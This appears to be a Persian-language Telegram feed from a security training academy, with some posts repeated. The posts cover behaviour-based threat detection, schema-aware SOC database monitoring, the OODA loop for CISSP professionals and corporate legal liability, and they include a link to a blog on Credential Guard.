مهاجم دیگر نمیتواند با تغییر ابزار یا IP به کار خود ادامه دهد. او باید روش فکر کردن و عمل کردن خود را از پایه تغییر دهد که این کار بسیار پرهزینه، زمانبر و گاهی غیرممکن است.
مثال: ما متوجه میشویم که مهاجم همیشه ابتدا از طریق فیشینگ وارد میشود، سپس با استفاده از PowerShell یک اسکریپت بدون فایل (Fileless) را برای حرکت جانبی اجرا میکند و در نهایت دادهها را فشرده کرده و از طریق DNS Tunneling به بیرون ارسال میکند. ما با تمرکز بر شناسایی و مسدود کردن هر یک از این رفتارها (نه فقط ابزارها)، کل عملیات او را، صرف نظر از ابزاری که استفاده میکند، مختل میکنیم.
#آکادمی_روزبه www.haumoun.com
ثبت نام دوره سطح ۱ و ۲ واتس اپ 09902857290
❤6💯1
تجربه امروز در SOC و پایگاه داده
اسکما
در معماری پایش امنیتی پایگاهداده، وجود یک سازوکار هماهنگ میان Parser، Rule Engine و Dashboard حیاتی است تا تحلیلگر SOC بتواند رفتارهای غیرعادی را در لایه داده بهصورت دقیق و با زمینه سازی (Context Awareness) مشاهده کند.
نخستین گام، تقویت Parser است؛ این مؤلفه باید فیلد حیاتی schema_name را از لاگهای SQL استخراج و ذخیره کند، زیرا بدون آن، تشخیص سطح حساسیت و حوزهی داده عملاً غیرممکن است. دادههای خام، زمانی ارزش امنیتی مییابند که با اسکما مرتبط شوند و مشخص شود عملیات روی کدام بخش از دادههای سازمان انجام گرفته است.
در گام دوم، Rule Engine باید تناظر یابی حساسیت یا Sensitivity Mapping اسکماها را بشناسد و آن را در تحلیل همبسته بهکار گیرد. به این معنا که یک دستور SELECT از اسکمای عمومی ممکن است عادی تلقی شود، اما همان دستور از اسکمای مالی یا منابع انسانی باید بهعنوان رویداد پرریسک نشانهگذاری گردد. این همبستگی میان حساسیت داده و رفتار کاربر، مبنای تشخیص تهدیدهای داخلی و دسترسیهای غیرمجاز است.
در نهایت، Dashboard باید خروجی تحلیل را بر اساس طبقهبندی اسکماها نمایش دهد تا فعالیتهای مرتبط با اسکماهای Critical در نمایی مجزا، فوری و رنگکدبندیشده در دسترس تیم SOC قرار گیرد.
#آکادمی_روزبه
اسکما
در معماری پایش امنیتی پایگاهداده، وجود یک سازوکار هماهنگ میان Parser، Rule Engine و Dashboard حیاتی است تا تحلیلگر SOC بتواند رفتارهای غیرعادی را در لایه داده بهصورت دقیق و با زمینه سازی (Context Awareness) مشاهده کند.
نخستین گام، تقویت Parser است؛ این مؤلفه باید فیلد حیاتی schema_name را از لاگهای SQL استخراج و ذخیره کند، زیرا بدون آن، تشخیص سطح حساسیت و حوزهی داده عملاً غیرممکن است. دادههای خام، زمانی ارزش امنیتی مییابند که با اسکما مرتبط شوند و مشخص شود عملیات روی کدام بخش از دادههای سازمان انجام گرفته است.
در گام دوم، Rule Engine باید تناظر یابی حساسیت یا Sensitivity Mapping اسکماها را بشناسد و آن را در تحلیل همبسته بهکار گیرد. به این معنا که یک دستور SELECT از اسکمای عمومی ممکن است عادی تلقی شود، اما همان دستور از اسکمای مالی یا منابع انسانی باید بهعنوان رویداد پرریسک نشانهگذاری گردد. این همبستگی میان حساسیت داده و رفتار کاربر، مبنای تشخیص تهدیدهای داخلی و دسترسیهای غیرمجاز است.
در نهایت، Dashboard باید خروجی تحلیل را بر اساس طبقهبندی اسکماها نمایش دهد تا فعالیتهای مرتبط با اسکماهای Critical در نمایی مجزا، فوری و رنگکدبندیشده در دسترس تیم SOC قرار گیرد.
#آکادمی_روزبه
👏9❤1
بیاموزید
نشر دهید
چیزی از شما کم نمیشود
بلکه
افزون میشود
امتحان کنید
نشر دهید
چیزی از شما کم نمیشود
بلکه
افزون میشود
امتحان کنید
❤23💯5
الان میخوانم ؛ برایتان خواهم نوشت
https://specterops.io/blog/2025/10/23/catching-credential-guard-off-guard/
https://specterops.io/blog/2025/10/23/catching-credential-guard-off-guard/
SpecterOps
Catching Credential Guard Off Guard - SpecterOps
Uncovering the protection mechanisms provided by modern Windows security features and identifying new methods for credential dumping.
❤5
👏9
از ارائه های همایش فارغالتحصیلان CISSP
🟣چرا در حلقهی OODA، توقف در “مشاهده” و “جهتگیری” ضامن تصمیمات امنیتی موفق است؟
💯تبریک به فارغالتحصیلان محترم آکادمی روزبه.
دریافت گواهی CISSP یک نقطه عطف فنی نیست؛ بلکه تأییدیهای بر توانایی شما در تفکر استراتژیک، جامع و ریسکمحور است.
در دنیای امنیت که سرعت تغییرات تهدیدات سرسامآور است، بزرگترین ابزار شما دیگر یک فایروال نیست، بلکه حلقه OODA (Observe, Orient, Decide, Act) است. اما چگونه یک CISSP حرفهای از این چارچوب برای جلوگیری از فاجعه استفاده میکند؟
🔴بزرگترین اشتباه در مدیریت امنیت، عجله برای رسیدن به فاز “Decide” (تصمیم) و “Act” (اجرا) است. رهبران امنیتی موفق، عمداً سرعت خود را در فازهای ابتدایی - “Observe” (مشاهده) و “Orient” (جهتگیری) - کاهش میدهند.
مشاهده فراتر از داده: در فاز “Observe”، ما صرفاً به هشدارها و لاگهای خام نگاه نمیکنیم. ما به جمعآوری اطلاعات جامع (Threat Intelligence)، درک عمیق از معماری کسبوکار، تعامل با قوانین و مقررات، و آگاهی از فرهنگ سازمانی میپردازیم. مشاهده یک متخصص CISSP شامل متن (Context) است، نه فقط داده.
فاز “Orient” حیاتیترین بخش است که اغلب نادیده گرفته میشود. اینجا جایی است که داده خام به بینش عملی تبدیل میشود. در این مرحله، ما:
✅️دادههای مشاهده شده را در فریمورکهای ریسک (مانند ISO 27005 یا NIST) مدلسازی میکنیم.
✅️ تعصبات شناختی (Cognitive Biases) تیم و خودمان را شناسایی میکنیم.
✅️تأثیرات تصمیمات احتمالی بر روی موجودیتهای کلیدی (C-Suite، مشتریان، سهامداران) را پیشبینی میکنیم.
✅️دانش خود در حوزه معماری امنیت و طراحی سیستمهای امن را برای درک اینکه آیا این تهدید یک نقص سیستمی است یا یک نقص عملیاتی، به کار میگیریم.
🔰توقف هوشمندانه، تصمیم ایمن: اگر فازهای “Observe” و “Orient” با عمق کافی انجام نشود، تصمیم (Decide) در خلاء یا بر اساس فرضیات ناقص گرفته خواهد شد. تصمیمگیری عجولانه منجر به “اقدامات فاجعهبار” میشود: هدر رفتن بودجه، اتخاذ راهحلهای کوتاهمدت ناامن، یا بدتر از همه، نادیده گرفتن ریشه اصلی مشکل.
✳️به عنوان یک CISSP، ماموریت ما کاهش دادن زمان کل حلقه OODA است، و این کاهش زمان نه با سرعت دادن به مراحل، بلکه با افزایش دقت “مشاهده” و “جهتگیری” محقق میشود. این کند کردن استراتژیک، تضمین میکند که تصمیمات ما دقیق و پایدار باشند و احتمال شکست استراتژیک به حداقل برسد.
موفقیت شما در امنیت، در عمق تفکر شما نهفته است، نه فقط در سرعت عملتان.
#OODA #مدیریت_ریسک #امنیت_اطلاعات #آکادمی_روزبه
www.haumoun.com
پنج شنبه ۸ آبان ۱۴۰۴ تهران شرکت هامون
🟣چرا در حلقهی OODA، توقف در “مشاهده” و “جهتگیری” ضامن تصمیمات امنیتی موفق است؟
💯تبریک به فارغالتحصیلان محترم آکادمی روزبه.
دریافت گواهی CISSP یک نقطه عطف فنی نیست؛ بلکه تأییدیهای بر توانایی شما در تفکر استراتژیک، جامع و ریسکمحور است.
در دنیای امنیت که سرعت تغییرات تهدیدات سرسامآور است، بزرگترین ابزار شما دیگر یک فایروال نیست، بلکه حلقه OODA (Observe, Orient, Decide, Act) است. اما چگونه یک CISSP حرفهای از این چارچوب برای جلوگیری از فاجعه استفاده میکند؟
🔴بزرگترین اشتباه در مدیریت امنیت، عجله برای رسیدن به فاز “Decide” (تصمیم) و “Act” (اجرا) است. رهبران امنیتی موفق، عمداً سرعت خود را در فازهای ابتدایی - “Observe” (مشاهده) و “Orient” (جهتگیری) - کاهش میدهند.
مشاهده فراتر از داده: در فاز “Observe”، ما صرفاً به هشدارها و لاگهای خام نگاه نمیکنیم. ما به جمعآوری اطلاعات جامع (Threat Intelligence)، درک عمیق از معماری کسبوکار، تعامل با قوانین و مقررات، و آگاهی از فرهنگ سازمانی میپردازیم. مشاهده یک متخصص CISSP شامل متن (Context) است، نه فقط داده.
فاز “Orient” حیاتیترین بخش است که اغلب نادیده گرفته میشود. اینجا جایی است که داده خام به بینش عملی تبدیل میشود. در این مرحله، ما:
✅️دادههای مشاهده شده را در فریمورکهای ریسک (مانند ISO 27005 یا NIST) مدلسازی میکنیم.
✅️ تعصبات شناختی (Cognitive Biases) تیم و خودمان را شناسایی میکنیم.
✅️تأثیرات تصمیمات احتمالی بر روی موجودیتهای کلیدی (C-Suite، مشتریان، سهامداران) را پیشبینی میکنیم.
✅️دانش خود در حوزه معماری امنیت و طراحی سیستمهای امن را برای درک اینکه آیا این تهدید یک نقص سیستمی است یا یک نقص عملیاتی، به کار میگیریم.
🔰توقف هوشمندانه، تصمیم ایمن: اگر فازهای “Observe” و “Orient” با عمق کافی انجام نشود، تصمیم (Decide) در خلاء یا بر اساس فرضیات ناقص گرفته خواهد شد. تصمیمگیری عجولانه منجر به “اقدامات فاجعهبار” میشود: هدر رفتن بودجه، اتخاذ راهحلهای کوتاهمدت ناامن، یا بدتر از همه، نادیده گرفتن ریشه اصلی مشکل.
✳️به عنوان یک CISSP، ماموریت ما کاهش دادن زمان کل حلقه OODA است، و این کاهش زمان نه با سرعت دادن به مراحل، بلکه با افزایش دقت “مشاهده” و “جهتگیری” محقق میشود. این کند کردن استراتژیک، تضمین میکند که تصمیمات ما دقیق و پایدار باشند و احتمال شکست استراتژیک به حداقل برسد.
موفقیت شما در امنیت، در عمق تفکر شما نهفته است، نه فقط در سرعت عملتان.
#OODA #مدیریت_ریسک #امنیت_اطلاعات #آکادمی_روزبه
www.haumoun.com
پنج شنبه ۸ آبان ۱۴۰۴ تهران شرکت هامون
⚡4🙏2❤1
بحثی حقوقی از درس CISSP
📘 مسئولیت مستقیم شرکتها (Direct Liability)
مسئولیت مستقیم یعنی حالتی که شرکت یا سازمان به خاطر اجازه دادن، چشمپوشی، یا نادیده گرفتن رفتار نادرست یکی از کارکنانش، خودش بهطور مستقیم در برابر قانون پاسخگو میشود.
به بیان سادهتر، اگر شرکت به شکل آگاهانه، یا از روی سهلانگاری، باعث شود کارمندی عمل خلافی انجام دهد، قانون آن را رفتار خود شرکت تلقی میکند.
این موضوع بهویژه درباره مدیران و افرادی صادق است که از طرف سازمان اختیار قانونی دارند و به نام آن عمل میکنند. چون مدیران میتوانند بخشی از مسئولیتهایشان را به کارمندان تفویض کنند، هرگاه فردی در چارچوب همان اختیار تفویضشده کاری انجام دهد، ممکن است مسئولیت مستقیماً متوجه شرکت شود.
بنابراین اگر بتوان ثابت کرد که رفتار، تصمیم یا کوتاهی شرکت موجب انجام عمل مجرمانه شده است، قانون سازمان را مسئول مستقیم جرم میداند، نه فقط کارمند متخلف را.
⚖️ رابطه با مفهوم Mens Rea (نیت یا آگاهی مجرمانه)
در جرائم کیفری، اصل بر این است که دادگاه باید ثابت کند فرد از پیامدهای مجرمانهی کار خود آگاه بوده و قصد ارتکاب جرم را داشته است ؛ یعنی وجود Mens Rea.
در مورد یک شرکت، این آگاهی معمولاً در تصمیمها یا خطمشیهای مدیریتی جستجو میشود.
با این حال، نوعی از جرائم وجود دارند که در آنها نیازی به اثبات نیت یا قصد مجرمانه نیست و همین وقوع عمل ممنوعه برای مسئولیتپذیری کافی است.
به این جرائم میگویند: جرائم با مسئولیت مطلق (Strict Liability Offenses).
در چنین حالتی، اگر کارمند در حین انجام وظایف خود مرتکب تخلفی شود -مثلاً نقض مقررات زیستمحیطی یا امنیت داده - شرکت بدون نیاز به اثبات قصد، پاسخگو خواهد بود.
🧩 اصل انتساب رفتار کارمند به شرکت
وقتی قانون، مسئولیت را به شرکتها تسری دهد، رفتار یا حتی قصد ذهنی یک کارمند میتواند به شرکت نسبت داده شود.
اما این انتساب فقط زمانی معتبر است که:
رفتار انجامشده در چارچوب وظایف شغلی و اختیارات قانونی فرد باشد.
به این معیار، در حقوق کیفری و مدیریتی، اصطلاحاً “Course and Capacity of Employment Benchmark” میگویند.
اگر کارمند دست به کاری بزند که خارج از محدودهی اختیاراتش است (مثلاً دسترسی غیرمجاز یا کلاهبرداری رایانهای برای منافع شخصی)، مسئولیت او بر عهدهی خودش است ؛ هرچند که سازمان کاملاً از تبعات حقوقی آن در امان نخواهد بود، چون ممکن است نبود کنترلهای نظارتی یا سهلانگاری مدیریتی خود شرکت زیر سؤال برود.
جمع بندی
مقوله Direct Liability یعنی سازمان بدون واسطه در وقوع جرم نقش داشته (با اقدام یا کوتاهی).
و Mens Rea در شرکت از طریق تصمیمها، سیاستها و بیاحتیاطی مدیران نمایان میشود.
وStrict Liability یعنی کافی است عمل ممنوعه رخ دهد تا شرکت مسئول باشد، حتی بدون اثبات نیت.
وCourse and Capacity Benchmark حدی است که تشخیص میدهد عمل کارمند، کاری سازمانی بوده یا شخصی.
وجود کنترلها، آموزشها و خطمشیهای روشن میتواند از انتساب Mens Rea به سازمان جلوگیری کند و این دقیقاً مصداق Due Diligence / Due Care است.
#آکادمی_روزبه
📘 مسئولیت مستقیم شرکتها (Direct Liability)
مسئولیت مستقیم یعنی حالتی که شرکت یا سازمان به خاطر اجازه دادن، چشمپوشی، یا نادیده گرفتن رفتار نادرست یکی از کارکنانش، خودش بهطور مستقیم در برابر قانون پاسخگو میشود.
به بیان سادهتر، اگر شرکت به شکل آگاهانه، یا از روی سهلانگاری، باعث شود کارمندی عمل خلافی انجام دهد، قانون آن را رفتار خود شرکت تلقی میکند.
این موضوع بهویژه درباره مدیران و افرادی صادق است که از طرف سازمان اختیار قانونی دارند و به نام آن عمل میکنند. چون مدیران میتوانند بخشی از مسئولیتهایشان را به کارمندان تفویض کنند، هرگاه فردی در چارچوب همان اختیار تفویضشده کاری انجام دهد، ممکن است مسئولیت مستقیماً متوجه شرکت شود.
بنابراین اگر بتوان ثابت کرد که رفتار، تصمیم یا کوتاهی شرکت موجب انجام عمل مجرمانه شده است، قانون سازمان را مسئول مستقیم جرم میداند، نه فقط کارمند متخلف را.
⚖️ رابطه با مفهوم Mens Rea (نیت یا آگاهی مجرمانه)
در جرائم کیفری، اصل بر این است که دادگاه باید ثابت کند فرد از پیامدهای مجرمانهی کار خود آگاه بوده و قصد ارتکاب جرم را داشته است ؛ یعنی وجود Mens Rea.
در مورد یک شرکت، این آگاهی معمولاً در تصمیمها یا خطمشیهای مدیریتی جستجو میشود.
با این حال، نوعی از جرائم وجود دارند که در آنها نیازی به اثبات نیت یا قصد مجرمانه نیست و همین وقوع عمل ممنوعه برای مسئولیتپذیری کافی است.
به این جرائم میگویند: جرائم با مسئولیت مطلق (Strict Liability Offenses).
در چنین حالتی، اگر کارمند در حین انجام وظایف خود مرتکب تخلفی شود -مثلاً نقض مقررات زیستمحیطی یا امنیت داده - شرکت بدون نیاز به اثبات قصد، پاسخگو خواهد بود.
🧩 اصل انتساب رفتار کارمند به شرکت
وقتی قانون، مسئولیت را به شرکتها تسری دهد، رفتار یا حتی قصد ذهنی یک کارمند میتواند به شرکت نسبت داده شود.
اما این انتساب فقط زمانی معتبر است که:
رفتار انجامشده در چارچوب وظایف شغلی و اختیارات قانونی فرد باشد.
به این معیار، در حقوق کیفری و مدیریتی، اصطلاحاً “Course and Capacity of Employment Benchmark” میگویند.
اگر کارمند دست به کاری بزند که خارج از محدودهی اختیاراتش است (مثلاً دسترسی غیرمجاز یا کلاهبرداری رایانهای برای منافع شخصی)، مسئولیت او بر عهدهی خودش است ؛ هرچند که سازمان کاملاً از تبعات حقوقی آن در امان نخواهد بود، چون ممکن است نبود کنترلهای نظارتی یا سهلانگاری مدیریتی خود شرکت زیر سؤال برود.
جمع بندی
مقوله Direct Liability یعنی سازمان بدون واسطه در وقوع جرم نقش داشته (با اقدام یا کوتاهی).
و Mens Rea در شرکت از طریق تصمیمها، سیاستها و بیاحتیاطی مدیران نمایان میشود.
وStrict Liability یعنی کافی است عمل ممنوعه رخ دهد تا شرکت مسئول باشد، حتی بدون اثبات نیت.
وCourse and Capacity Benchmark حدی است که تشخیص میدهد عمل کارمند، کاری سازمانی بوده یا شخصی.
وجود کنترلها، آموزشها و خطمشیهای روشن میتواند از انتساب Mens Rea به سازمان جلوگیری کند و این دقیقاً مصداق Due Diligence / Due Care است.
#آکادمی_روزبه
❤4💯4